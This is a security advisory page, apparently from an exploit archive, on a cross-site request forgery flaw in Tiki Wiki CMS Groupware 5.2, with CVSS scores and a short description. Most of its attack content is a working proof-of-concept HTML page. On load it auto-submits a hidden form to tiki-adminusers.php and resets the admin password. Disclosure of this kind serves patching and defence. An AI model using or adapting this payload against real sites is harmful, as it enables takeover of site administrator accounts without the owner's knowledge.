Tiki Wiki CMS Groupware 5.2 cross site request forgery vulnerability

2010-09-25 / 2019-11-06
Credit: John Leitch
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<!------------------------------------------------------------------------ # Software................Tiki Wiki CMS Groupware 5.2 # Vulnerability...........Cross-site Request Forgery # Download................htp://www.tiki.org # Release Date............9/24/2010 # Tested On...............Windows Vista + XAMPP # ------------------------------------------------------------------------ # Author..................John Leitch # Site....................http://www.johnleitch.net/ # Email...................john.leitch5@gmail.com # ------------------------------------------------------------------------ # # --Description-- # # A cross-site request forgery vulnerability in Tiki Wiki CMS Groupware # 5.2 can be exploited to change the admin password. # # # --PoC--> <html> <body onload="document.forms[0].submit.click()"> <form method="POST" action="http://localhost/tiki-5.2/tiki-adminusers.php"> <input type="hidden" name="name" value="admin" /> <input type="hidden" name="pass" value="Password2" /> <input type="hidden" name="pass2" value="Password2" /> <input type="hidden" name="genepass" value="" /> <input type="hidden" name="email" value="test@test.com" /> <input type="hidden" name="user" value="1" /> <input type="hidden" name="edituser" value="1" /> <input type="submit" name="submit" value="Save" /> </form> </body> </html>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top